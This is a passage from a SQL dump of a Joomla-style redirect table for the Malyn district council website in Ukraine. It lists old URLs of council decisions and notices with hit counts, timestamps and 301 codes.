00:00:00',301),(17387,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-?limitstart=0','','','',4,0,'2015-11-04 18:05:09','0000-00-00 00:00:00',301),(17388,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=33&Itemid=66&lang=ru&limitstart=5','','','',3,0,'2015-11-04 18:30:25','0000-00-00 00:00:00',301),(17389,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=34&Itemid=68&lang=uk','','','',20,0,'2015-11-04 18:32:52','0000-00-00 00:00:00',301),(17390,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=33&Itemid=66&lang=ru&limitstart=5','','','',1,0,'2015-11-04 18:59:58','0000-00-00 00:00:00',301),(17391,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=33:-20052011&layout=blog&Itemid=66&lang=ru&limitstart=20','','','',2,0,'2015-11-04 19:14:52','0000-00-00 00:00:00',301),(17392,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=33:-20052011&layout=blog&Itemid=66&lang=uk&limitstart=5','','','',1,0,'2015-11-04 19:28:06','0000-00-00 00:00:00',301),(17393,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=317:-l-2008-2012-r&catid=33&Itemid=66&lang=uk','','','',2,0,'2015-11-04 19:48:47','0000-00-00 00:00:00',301),(17394,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=42&Itemid=80&lang=uk','','','',12,0,'2015-11-04 22:04:26','0000-00-00 00:00:00',301),(17395,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=316:-2011-2012-&catid=33&Itemid=66&lang=uk','','','',2,0,'2015-11-04 22:28:27','0000-00-00 00:00:00',301),(17396,'http://www.malyn-rayrada.org.ua/index.php?Itemid=62&catid=31&id=274:2011-03-28-08-22-32&lang=uk&option=com_content&view=article','','','',4,0,'2015-11-04 23:11:26','0000-00-00 00:00:00',301),(17397,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&id=51:--19072013-&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','','',1,0,'2015-11-04 23:39:36','0000-00-00 00:00:00',301),(17398,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=543:2012-01-26-11-58-53&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',9,0,'2015-11-05 01:30:07','0000-00-00 00:00:00',301),(17399,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1069-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-chopovitskoji-selishchnoji-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-05 01:39:57','0000-00-00 00:00:00',301),(17400,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1141-budo-vorob-jivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-05 01:40:04','0000-00-00 00:00:00',301),(17401,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1142-chopovitska-selishchna-rada-informue','','','',4,0,'2015-11-05 01:40:06','0000-00-00 00:00:00',301),(17402,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1142-chopovitska-selishchna-rada-informue?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-05 01:40:08','0000-00-00 00:00:00',301),(17403,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1143-chopovitska-selishchna-rada-informue-pro-zatverdzhennya-polozhennya','','','',4,0,'2015-11-05 01:40:10','0000-00-00 00:00:00',301),(17404,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1143-chopovitska-selishchna-rada-informue-pro-zatverdzhennya-polozhennya?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-05 01:40:12','0000-00-00 00:00:00',301),(17405,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1144-ukrajinkivska-silska-rada-informue','','','',1,0,'2015-11-05 01:40:14','0000-00-00 00:00:00',301),(17406,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1144-ukrajinkivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-05 01:40:15','0000-00-00 00:00:00',301),(17407,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1145-ustinivska-silska-rada-informue','','','',4,0,'2015-11-05 01:40:17','0000-00-00 00:00:00',301),(17408,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1145-ustinivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-05 01:40:19','0000-00-00 00:00:00',301),(17409,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1146-ivanivska-silska-rada-informue','','','',8,0,'2015-11-05 01:40:21','0000-00-00 00:00:00',301),(17410,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1146-ivanivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-05 01:40:23','0000-00-00 00:00:00',301),(17411,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/605-pro-vikonannja-planu-roboti-rajonnoi-radi-za-2013?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-05 01:41:08','0000-00-00 00:00:00',301),(17412,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/665-pro-nadannja-dozvolu-komunalnij-ustanovi-malinskij?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-05 01:41:13','0000-00-00 00:00:00',301),(17413,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/676-pro-vnesennja-zmin-do-rajonnoi-kompleksnoi','','','',2,0,'2015-11-05 01:41:14','0000-00-00 00:00:00',301),(17414,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/697-pro-vstanovlennja-nadbavki-do-posadovogo-okladu_3','','','',9,0,'2015-11-05 01:41:31','0000-00-00 00:00:00',301),(17415,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/699-pro-zvernennja-deputativ-malinskoi-rajonnoi-radi_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-05 01:41:35','0000-00-00 00:00:00',301),(17416,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/461-pro-vnesennja-dopovnennja-do-rajonnoi-kompleksnoi','','','',2,0,'2015-11-05 01:41:37','0000-00-00 00:00:00',301),(17417,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/472-pro-zatverdzhennja-programi-zajnjatosti-naselennja_2?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-05 01:41:39','0000-00-00 00:00:00',301),(17418,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/503-pro-viznachennja-statusu-komunalnogo-zakladu?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-05 01:41:41','0000-00-00 00:00:00',301),(17419,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/509-pro-vnesennja-zmin-do-strukturi-vikonavchogo?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-05 01:41:43','0000-00-00 00:00:00',301),(17420,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/358-pro-hid-vikonannja-rajonnoi-programi-vidpochinku_3','','','',9,0,'2015-11-05 01:41:49','0000-00-00 00:00:00',301),(17421,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/359-pro-hid-vikonannja-rajonnoi-programi-provedennja-u?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-05 01:41:51','0000-00-00 00:00:00',301),(17422,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/360-pro-vnesennja-zmin-do-polozhennja-pro-postijni','','','',4,0,'2015-11-05 01:41:53','0000-00-00 00:00:00',301),(17423,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/371-pro-priznachennja-kerivnika-komunalnogo_2','','','',9,0,'2015-11-05 01:41:55','0000-00-00 00:00:00',301),(17424,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/106-pro-hid-vikonannja-rajonnoi-programi-realizacii_2','','','',1,0,'2015-11-05 01:42:08','0000-00-00 00:00:00',301),(17425,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/111-pro-plan-roboti-rajonnoi-radi-na-i-pivrichchja','','','',4,0,'2015-11-05 01:42:11','0000-00-00 00:00:00',301),(17426,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/112-pro-hid-vikonannja-rajonnoi-programi_3?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-05 01:42:14','0000-00-00 00:00:00',301),(17427,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/116-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_3?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-05 01:42:22','0000-00-00 00:00:00',301),(17428,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/165-pro-hid-vikonannja-rajonnoi-cilovoi-programi_3','','','',1,0,'2015-11-05 01:42:24','0000-00-00 00:00:00',301),(17429,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/166-pro-hid-vikonannja-rajonnoi-programi-vidpochinku_2?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-05 01:42:28','0000-00-00 00:00:00',301),(17430,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/188-pro-vnesennja-zmin-do-polozhennja-pro-konkursnij?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-05 01:42:32','0000-00-00 00:00:00',301),(17431,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/292-pro-zatverdzhennja-regionalnoi-programi-rozvitku','','','',9,0,'2015-11-05 01:42:34','0000-00-00 00:00:00',301),(17432,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/55-pro-hid-vikonannja-rajonnoi-programi-rozvitku_2','','','',1,0,'2015-11-05 01:42:36','0000-00-00 00:00:00',301),(17433,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/80-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_2','','','',1,0,'2015-11-05 01:42:40','0000-00-00 00:00:00',301),(17434,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/802-pro-peredachu-avtomobilja-gaz-3110_2?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-05 01:42:46','0000-00-00 00:00:00',301),(17435,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/803-pro-plan-roboti-rajonnoi-radi-na-ii-pivrichchja_3','','','',2,0,'2015-11-05 01:42:48','0000-00-00 00:00:00',301),(17436,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/130-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_4','','','',3,0,'2015-11-05 01:42:57','0000-00-00 00:00:00',301),(17437,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/87-pro-vnesennja-zmin-do-programi-pidtrimki-malogo?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-05 01:43:03','0000-00-00 00:00:00',301),(17438,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/417-pro-peredachu-materialnih-cinnostej_2','','','',1,0,'2015-11-05 01:43:05','0000-00-00 00:00:00',301),(17439,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/418-pro-zatverdzhennja-pereliku-pidpriemstv-shho-e?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-05 01:43:07','0000-00-00 00:00:00',301),(17440,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/431-pro-zatverdzhennja-porjadku-i-normativiv_2?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-05 01:43:11','0000-00-00 00:00:00',301),(17441,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/332-pro-hid-vikonannja-rajonnoi-programi_5','','','',1,0,'2015-11-05 01:43:21','0000-00-00 00:00:00',301),(17442,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/333-pro-vikonannja-planu-roboti-rajonnoi-radi-za-i?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-05 01:43:25','0000-00-00 00:00:00',301),(17443,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/343-pro-zatverdzhennja-polozhennja-pro-porjadok_3?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-05 01:43:31','0000-00-00 00:00:00',301),(17444,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/349-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_12','','','',1,0,'2015-11-05 01:43:33','0000-00-00 00:00:00',301),(17445,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/350-pro-zatverdzhennja-tehnichnoi-dokumentacii-po_5?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-05 01:43:37','0000-00-00 00:00:00',301),(17446,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/602-pro-hid-vikonannja-rajonnoi-socialnoi-programi_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-05 01:43:39','0000-00-00 00:00:00',301),(17447,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/610-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_13?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-05 01:43:45','0000-00-00 00:00:00',301),(17448,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/618-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_13?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-05 01:43:51','0000-00-00 00:00:00',301),(17449,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/623-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_14?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-05 01:43:53','0000-00-00 00:00:00',301),(17450,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/285-pro-peredachu-neruhomogo-majna-shho-perebuvae-u?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-05 01:44:07','0000-00-00 00:00:00',301),(17451,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/737-pro-zatverdzhennja-programi-polipshennja-stanu?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-05 01:44:19','0000-00-00 00:00:00',301),(17452,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/4-pro-zatverdzhennja-kompleksnoi-programi-rozvitku?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-05 01:44:25','0000-00-00 00:00:00',301),(17453,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/441-pro-zatverdzhennja-rozmiru-vartosti-produktiv_3?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-05 01:44:27','0000-00-00 00:00:00',301),(17454,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/457-pro-vnesennja-zmin-do-programi-zajnjatosti_2','','','',2,0,'2015-11-05 01:44:29','0000-00-00 00:00:00',301),(17455,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/458-pro-vnesennja-zmin-do-rajonnoi-programi_3','','','',4,0,'2015-11-05 01:44:31','0000-00-00 00:00:00',301),(17456,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/458-pro-vnesennja-zmin-do-rajonnoi-programi_3?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-05 01:44:33','0000-00-00 00:00:00',301),(17457,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/459-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_19?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-05 01:44:35','0000-00-00 00:00:00',301),(17458,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/481-pro-zminu-nazvi-ta-zatverdzhennja-statutu?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-05 01:44:43','0000-00-00 00:00:00',301),(17459,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/13-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-05 01:44:55','0000-00-00 00:00:00',301),(17460,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1165-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',4,0,'2015-11-05 01:45:07','0000-00-00 00:00:00',301),(17461,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1165-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-05 01:45:09','0000-00-00 00:00:00',301),(17462,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1169-pro-neobkhidnist-vzyattya-na-oblik-bezkhazyajnogo-nerukhomogo-majna?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-05 01:45:11','0000-00-00 00:00:00',301),(17463,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/927-pro-spisannya-osnovnikh-zasobiv?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-05 03:13:18','0000-00-00 00:00:00',301),(17465,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40&id=596:2012-02-28-12-59-05&lang=ru&option=com_content&view=article','','','',2,0,'2015-11-05 03:51:53','0000-00-00 00:00:00',301),(17466,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=795:-20-2011-108-l-r-&catid=45&Itemid=84&lang=uk','','','',4,0,'2015-11-05 04:30:38','0000-00-00 00:00:00',301),(17467,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=834:-20-&catid=11&Itemid=14&lang=en','','','',2,0,'2015-11-05 04:31:37','0000-00-00 00:00:00',301),(17468,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/698-pro-rozmishhennja-timchasovo-vilnih-koshtiv','','','',40,0,'2015-11-05 04:36:20','0000-00-00 00:00:00',301),(17469,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/507-pro-hid-vikonannja-rajonnoi-programi-turbota-na','','','',76,0,'2015-11-05 05:16:21','0000-00-00 00:00:00',301),(17470,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=345:2011-06-15-12-28-17&catid=34:--15062011-&Itemid=68&lang=ru','','','',2,0,'2015-11-05 05:16:38','0000-00-00 00:00:00',301),(17471,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/428-pro-vstanovlennja-nadbavki-do-posadovogo-okladu_2','','','',14,0,'2015-11-05 05:16:47','0000-00-00 00:00:00',301),(17472,'http://www.malyn-rayrada.org.ua/index.php?Itemid=62&catid=31:-25032011&id=274:2011-03-28-08-22-32&lang=ru&option=com_content&view=article','','','',3,0,'2015-11-05 05:38:10','0000-00-00 00:00:00',301),(17473,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/367-pro-peredachu-materialnih-cinnostej','','','',3,0,'2015-11-05 05:57:10','0000-00-00 00:00:00',301),(17474,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/149-pro-hid-vikonannja-rajonnoi-programi_4','','','',1,0,'2015-11-05 05:57:12','0000-00-00 00:00:00',301),(17475,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/60-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_2','','','',1,0,'2015-11-05 05:57:13','0000-00-00 00:00:00',301),(17476,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=610:2012-03-23-06-34-31&catid=11&lang=uk','','','',2,0,'2015-11-05 06:05:55','0000-00-00 00:00:00',301),(17477,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&id=39:-22022012-&lang=ru&layout=blog&limitstart=10&option=com_content&view=category','','','',3,0,'2015-11-05 08:32:03','0000-00-00 00:00:00',301),(17478,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=315:2011-05-20-13-07-47&catid=33&Itemid=66&lang=en','','','',13,0,'2015-11-05 09:25:24','0000-00-00 00:00:00',301),(17480,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/398-pro-vnesennja-do-pereliku-ob’ektiv-shho','','','',2,0,'2015-11-05 11:19:07','0000-00-00 00:00:00',301),(17481,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&id=49&lang=uk&layout=blog&option=com_content&view=category','','','',3,0,'2015-11-05 12:00:20','0000-00-00 00:00:00',301),(17482,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1146-ivanivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-05 12:04:01','0000-00-00 00:00:00',301),(17483,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/665-pro-nadannja-dozvolu-komunalnij-ustanovi-malinskij','','','',20,0,'2015-11-05 12:09:01','0000-00-00 00:00:00',301),(17484,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/674-pro-zatverdzhennja-rajonnoi-programi-poshuku-i','','','',38,0,'2015-11-05 12:09:06','0000-00-00 00:00:00',301),(17485,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/376-pro-vnesennja-zmin-ta-dopovnen-do-rajonnoi_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-05 12:09:24','0000-00-00 00:00:00',301),(17486,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/377-pro-vnesennja-zmin-ta-dopovnen-do-rajonnoi_3','','','',6,0,'2015-11-05 12:09:28','0000-00-00 00:00:00',301),(17487,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/378-pro-vstanovlennja-mezh-silskih-naselenih-punktiv?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-05 12:09:31','0000-00-00 00:00:00',301),(17488,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/393-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_8?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-05 12:09:35','0000-00-00 00:00:00',301),(17489,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/768-pro-peredachu-avtobusa?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-05 12:09:53','0000-00-00 00:00:00',301),(17490,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/116-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_3?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-05 12:10:03','0000-00-00 00:00:00',301),(17491,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/34-pro-plan-roboti-rajonnoi-radi-na-ii-pivrichchja?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-05 12:10:17','0000-00-00 00:00:00',301),(17492,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/47-pro-vnesennja-zmin-do-reglamentu-roboti-rajonnoi','','','',3,0,'2015-11-05 12:10:21','0000-00-00 00:00:00',301),(17493,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/79-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_3?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-05 12:10:24','0000-00-00 00:00:00',301),(17494,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/154-pro-hid-vikonannja-rajonnoi-kompleksnoi-programi_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-05 12:10:41','0000-00-00 00:00:00',301),(17495,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/96-pro-hid-vikonannja-rajonnoi-programi-vidznachennja','','','',16,0,'2015-11-05 12:10:51','0000-00-00 00:00:00',301),(17496,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/429-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_17?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-05 12:10:54','0000-00-00 00:00:00',301),(17497,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/349-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_12?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-05 12:10:56','0000-00-00 00:00:00',301),(17498,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/604-pro-nadannja-dozvolu-na-vigotovlennja-proektu?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-05 12:11:00','0000-00-00 00:00:00',301),(17499,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/606-pro-hid-vikonannja-rishen-rajonnoi-radi-vid-12','','','',67,0,'2015-11-05 12:11:03','0000-00-00 00:00:00',301),(17500,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/481-pro-zminu-nazvi-ta-zatverdzhennja-statutu?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-05 12:11:36','0000-00-00 00:00:00',301),(17501,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/485-pro-zminu-nazvi-ta-zatverdzhennja-statutiv','','','',10,0,'2015-11-05 12:11:38','0000-00-00 00:00:00',301),(17502,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/491-pro-zatverdzhennja-polozhennja-pro-vidznaku-90?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-05 12:11:45','0000-00-00 00:00:00',301),(17503,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/322-pro-zatverdzhennja-kompleksnoi-programi-protidii','','https://www.google.com.ua/','',14,0,'2015-11-05 12:29:11','0000-00-00 00:00:00',301),(17505,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/573-pro-klopotannja-pered-departamentom-praci-ta','','','',6,0,'2015-11-05 14:53:11','0000-00-00 00:00:00',301),(17506,'http://www.malyn-rayrada.org.ua/_Ympäröivän_Malynin_piirin_kotisivut','','','',88,0,'2015-11-05 15:59:37','0000-00-00 00:00:00',301),(17507,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=201:--------l-r--2011--&lang=ru&option=com_content&view=article','','','',3,0,'2015-11-05 16:08:31','0000-00-00 00:00:00',301),(17508,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=196:---------------------2005-2010-&catid=29&Itemid=60&lang=ru','','','',2,0,'2015-11-05 16:51:26','0000-00-00 00:00:00',301),(17510,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=420:2011-09-30-09-25-52&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',7,0,'2015-11-05 18:46:19','0000-00-00 00:00:00',301),(17511,'http://www.malyn-rayrada.org.ua/index.php?Itemid=9&catid=6&id=6:2010-06-05-14-26-47&lang=uk&option=com_content&view=article','','','',1,0,'2015-11-05 20:05:19','0000-00-00 00:00:00',301),(17514,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=403:2011-09-29-05-41-20&lang=uk&option=com_content&view=article','','','',3,0,'2015-11-06 00:52:42','0000-00-00 00:00:00',301),(17515,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/927-pro-spisannya-osnovnikh-zasobiv','','','',7,0,'2015-11-06 02:24:03','0000-00-00 00:00:00',301),(17516,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12092012-','','','',7,0,'2015-11-06 02:24:11','0000-00-00 00:00:00',301),(17517,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=693:2012-06-06-14-15-01&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2015-11-06 02:41:22','0000-00-00 00:00:00',301),(17518,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=316:-2011-2012-&catid=33&Itemid=66&lang=uk','','','',7,0,'2015-11-06 02:41:23','0000-00-00 00:00:00',301),(17519,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=45&Itemid=84&lang=uk','','','',16,0,'2015-11-06 02:49:33','0000-00-00 